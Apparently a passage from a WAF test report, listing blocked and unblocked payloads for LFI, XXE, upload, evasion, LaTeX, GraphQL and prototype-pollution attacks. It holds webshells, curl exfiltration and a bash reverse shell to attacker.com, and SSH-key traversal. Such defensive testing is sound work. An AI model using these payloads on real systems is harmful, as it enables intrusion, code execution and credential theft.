  • Test cases: 9 | Passed: 9 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | GET | LFI WAF bypass - php://filter base64 to read source code | `php://filter/convert.base64-encode/resource=index.php` | 403 |
| 🛡️ | GET | LFI WAF bypass - data:// wrapper | `data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9zaGFkb3cnKTs/Pg==` | 403 |
| 🛡️ | GET | LFI WAF bypass - php://filter chain RCE (iconv filter chain) | `php://filter/convert.iconv.UTF8.CSISO2022KR\|convert.base64-encode\|convert.iconv.UTF8.UTF7\|convert.iconv.CP1026.UTF16\|convert.iconv.L6.UNICODE\|convert....` | 403 |
| 🛡️ | GET | LFI WAF bypass - expect:// wrapper | `expect://cat /etc/shadow` | 403 |
| 🛡️ | GET | LFI WAF bypass - compress.zlib:// wrapper to evade path checks | `compress.zlib://file:///etc/shadow` | 403 |
| 🛡️ | GET | LFI WAF bypass - zip:// wrapper | `zip:///var/www/uploads/evil.zip%23shell.php` | 403 |
| 🛡️ | POST | LFI WAF bypass - php://input with code in the POST body | `php://input + Body: <?php system('id');?>` | 403 |
| 🛡️ | GET | LFI WAF bypass - phar:// deserialization | `phar://uploads/evil.jpg/shell.php` | 403 |
| 🛡️ | GET | LFI WAF bypass - pearcmd.php RCE | `/usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET[1])?>+/tmp/shell.php` | 403 |

4.33 waf bypass xxe

  • Test cases: 11 | Passed: 11 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XXE WAF bypass - XInclude to sidestep DOCTYPE restrictions | `<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/shadow"/></foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - base64 via php://filter to evade file-content detection | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">]><foo>&xxe;</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - UTF-7 encoded document | `<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-xxe+ACA-SYSTEM+ACA-+ACI-file:///etc/shadow+ACIAPg-+ADs-+...` | 403 |
| 🛡️ | POST | XXE WAF bypass - parameter entity + external DTD (out-of-band) | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">%xxe;%exfil;]><foo>test</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - SVG document format | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><svg width="100" height="100">&xxe;</svg>` | 403 |
| 🛡️ | POST | XXE WAF bypass - double-encoded file path | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///%252e%252e/%252e%252e/etc/shadow">]><foo>&xxe;</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - SOAP envelope | `<soap:Body xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo></soap:Bod...` | 403 |
| 🛡️ | POST | XXE WAF bypass - GSM charset declaration | `<?xml version="1.0" encoding="gsm"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - netdoc:// scheme (Java) | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "netdoc:///etc/shadow">]><foo>&xxe;</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - jar:// scheme reading Java application configuration | `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">]><foo>&xxe;</foo>` | 403 |
| 🛡️ | POST | XXE WAF bypass - XSLT document() file read | `<xsl:value-of select="document('/etc/shadow')"/>` | 403 |

4.34 waf bypass upload

  • Test cases: 15 | Passed: 15 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Upload WAF bypass - double extension (.php.jpg) + webshell | `shell.php.jpg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - null-byte truncation (PHP < 5.3) + webshell | `shell.php%00.jpg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - trailing space + webshell | `shell.php <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - trailing dot + webshell | `shell.php. <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - semicolon truncation (IIS 6.0) + webshell | `shell.asp;.jpg <% Execute(Request("cmd")) %>` | 403 |
| 🛡️ | POST | Upload WAF bypass - forged Content-Type image/jpeg + webshell | `Content-Type: image/jpeg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - forged image header (GIF89a) + webshell | `GIF89a;<?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - forged image header (PNG) + webshell | `\x89PNG\r\n\x1a\n<?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - PHP short tag + webshell | `<?=system($_GET[1])?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - PHP script-tag form to evade blacklists + webshell | `<script language="php">system($_GET[1]);</script>` | 403 |
| 🛡️ | POST | Upload WAF bypass - Windows ADS hidden stream + webshell | `shell.php::$DATA <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - NTFS attribute name (::$INDEX_ALLOCATION) | `shell.php::$INDEX_ALLOCATION <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - .phtml extension + webshell | `shell.phtml <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - mixed-case extension (.pHp) + webshell | `shell.pHp <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | Upload WAF bypass - Unicode character in the filename + webshell | `shell.php%E3%80%82jpg <?php system($_GET[1]);?>` | 403 |

4.35 waf bypass general

  • Test cases: 10 | Passed: 10 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | General WAF bypass - HTTP method tampering (GET changed to POST to evade URL inspection) | `POST /endpoint?id=1' OR '1'='1` | 403 |
| 🛡️ | POST | General WAF bypass - HTTP parameter pollution (HPP), parameter sent twice | `id=1&id=1 UNION SELECT 1,2,3--` | 403 |
| 🛡️ | POST | General WAF bypass - Content-Type switched to multipart/form-data | `Content-Type: multipart/form-data; boundary=x Body: --x\r\nContent-Disposition: form-data; name="id"\r\n\r\n1' OR '1'='1\r\n--x--` | 403 |
| 🛡️ | POST | General WAF bypass - chunked Transfer-Encoding splitting the payload | `Transfer-Encoding: chunked\r\n\r\n5\r\n1' OR \r\n6\r\n'1'='1\r\n0\r\n\r\n` | 403 |
| 🛡️ | POST | General WAF bypass - Content-Type switched to application/json | `Content-Type: application/json Body: {"id":"1' OR '1'='1"}` | 403 |
| 🛡️ | POST | General WAF bypass - oversized body to exceed the inspection depth (10000 padding bytes) | `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...` | 403 |
| 🛡️ | POST | General WAF bypass - HTTP/1.0 downgrade | `GET /endpoint?id=1' OR '1'='1 HTTP/1.0` | 403 |
| 🛡️ | POST | General WAF bypass - compressed request body (gzip) | `Content-Encoding: gzip 1' UNION SELECT 1,2,3--` | 403 |
| 🛡️ | POST | General WAF bypass - mixed-case header names | `Content-TYPE: application/x-www-form-urlencoded id=1' OR '1'='1` | 403 |
| 🛡️ | POST | General WAF bypass - pipelined requests (smuggling) | `GET /endpoint?id=1 HTTP/1.1\r\nHost: target\r\n\r\nGET /endpoint?id=1' OR '1'='1 HTTP/1.1\r\nHost: target\r\n\r\n` | 403 |

4.36 latex injection

  • Test cases: 10 | Passed: 9 | Pass rate: 90.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | LaTeX - \include of an arbitrary .tex file to leak configuration | `\include{/var/www/html/config/database}` | 403 |
| 🛡️ | POST | LaTeX - \input of /etc/passwd to list system users | `\input{/etc/passwd}` | 403 |
| 🛡️ | POST | LaTeX - \lstinputlisting of /etc/shadow to leak password hashes | `\lstinputlisting{/etc/shadow}` | 403 |
| 🛡️ | POST | LaTeX - \verbatiminput of /etc/passwd (raw, uninterpreted) | `\verbatiminput{/etc/passwd}` | 403 |
| 🛡️ | POST | LaTeX - \immediate\write18 writing a webshell into the web root | `\immediate\write18{echo '<?php system(\$_GET[1]);?>' > /var/www/html/latex.php}` | 403 |
| ⚠️ | POST | LaTeX - \immediate\write18 running id to confirm code execution | `\immediate\write18{id}` | 200 |
| 🛡️ | POST | LaTeX - line-by-line read loop over a multi-line sensitive file (/etc/shadow) | `\newread\file\openin\file=/etc/shadow\loop\unless\ifeof\file\read\file to\line\text{\line}\repeat\closein\file` | 403 |
| 🛡️ | POST | LaTeX - \immediate\write18 with curl to exfiltrate data to the attacker | `\immediate\write18{curl http://attacker.com/$(cat /etc/passwd\|base64)}` | 403 |
| 🛡️ | POST | LaTeX - ^^ character encoding to evade blacklists, reading /etc/passwd | `\lstin^^70utlisting{/etc/passwd}` | 403 |
| 🛡️ | POST | LaTeX - \immediate\write18 reverse shell (bash TCP) | `\immediate\write18{bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'}` | 403 |

5. Failed test cases

The following 16 cases were not blocked and should be reviewed first:

| Category | Test case | Payload | HTTP status |
|---|---|---|---|
| waf bypass path | Path bypass - double URL encoding to read root's SSH private key for lateral movement | `%252e%252e%252f%252e%252e%252f%252e%252e%252froot%252f.ssh%252fid_rsa` | 200 |
| command injection | Command injection - nmap scan of internal ports | `; nmap -Pn -p 22,80,443,3306,6379 10.0.0.0/24` | 200 |
| prototype pollution | Prototype pollution - inject an admin flag through constructor.prototype | `{"constructor":{"prototype":{"isAdmin":true}}}` | 200 |
| prototype pollution | Prototype pollution - dotted key bypassing a JSON.parse-level filter (obj prefix) | `{"obj.__proto__.status":"admin"}` | 200 |
| graphql injection | GraphQL - introspection dumping the full schema (all types and fields) | `{__schema{types{name,fields{name,type{name,kind}}}}}` | 200 |
| graphql injection | GraphQL - __type query fetching a single type definition to leak sensitive fields | `{__type(name:"User"){name,fields{name,type{name,kind,ofType{name,kind}}}}}` | 200 |
| graphql injection | GraphQL - introspection dumping mutation operations (data-modification entry points) | `{__schema{mutationType{name,fields{name,args{name,type{name,kind}}}}}}` | 200 |
| graphql injection | GraphQL - deeply nested query for resource-exhaustion DoS | `{user{posts{comments{author{posts{comments{author{posts{comments{content}}}}}}}}}}` | 200 |
| graphql injection | GraphQL - batching attack: many login attempts in one request to bypass rate limiting | `[{"query":"mutation{login(username:\"admin\",password:\"admin123\"){token}}"},{"query":"mutation{login(username:\"admin\",password:\"password\"){token}}"},{"query":"mutation{login(username:\"admin\",p...` | 200 |
| graphql injection | GraphQL - aliases to brute-force a login in one request, bypassing rate limiting | `{m1:login(p:"1"){t} m2:login(p:"2"){t} m3:login(p:"3"){t} m4:login(p:"4"){t} m5:login(p:"5"){t}}` | 200 |
| graphql injection | GraphQL - introspection dumping all directive definitions (security policy leak) | `{__schema{directives{name,description,locations,args{name,description}}}}` | 200 |
| graphql injection | GraphQL - field-suggestion abuse to enumerate hidden fields | `{__schema{types{name}}} {user(id:1){name,NOTEXIST}}` | 200 |
| graphql injection | GraphQL - mutation creating an admin account (privilege escalation) | `mutation{addUser(name:"hacker",email:"hacker@evil.com",role:"admin"){id,name,role}}` | 200 |
| graphql injection | GraphQL - NoSQL injection through a GraphQL argument to dump all users | `{user(id:"{\"$gt\":\"\"}"){name,email,password}}` | 200 |
| graphql injection | GraphQL - introspection dumping subscription operations (real-time channels) | `{__schema{subscriptionType{name,fields{name,type{name,kind,ofType{name,kind}}}}}}` | 200 |
| latex injection | LaTeX - \immediate\write18 running id to confirm code execution | `\immediate\write18{id}` | 200 |

Last updated: 2026/5/31 15:48
Contributors: 青冰